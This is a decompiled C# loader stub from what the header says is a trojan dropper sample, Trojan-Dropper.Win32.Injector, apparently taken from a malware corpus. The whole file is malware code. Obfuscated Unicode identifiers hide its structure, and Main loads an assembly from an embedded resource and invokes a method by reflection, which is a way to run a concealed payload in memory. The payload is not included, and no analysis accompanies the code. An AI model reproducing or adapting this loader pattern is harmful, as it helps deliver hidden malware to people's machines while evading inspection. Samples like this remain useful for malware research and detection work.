// Decompiled with JetBrains decompiler // Type:  // Assembly: Msil, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 592E0705-5FE3-456B-BE3B-BDC64BF0EA12 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Injector.bohb-8459fa9a1d18ad0edf27e23258c967c9e734b43e94385e7834ac8244fbf1249c.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.Reflection; using System.Runtime.CompilerServices; [StandardModule] internal sealed class \uE000 { private static byte[] \uE000; static \uE000() { \uE008.\uE000(); \uE000.\uE000 = Msil.My.Resources.Resources.\uE002; } [STAThread] public static void Main() => RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Assembly.Load(\uE000.\uE000).GetType("Mammals.Gheorghe").GetMethod("CallThem").Invoke((object) null, new object[\uE009.\uE000(0)]))); }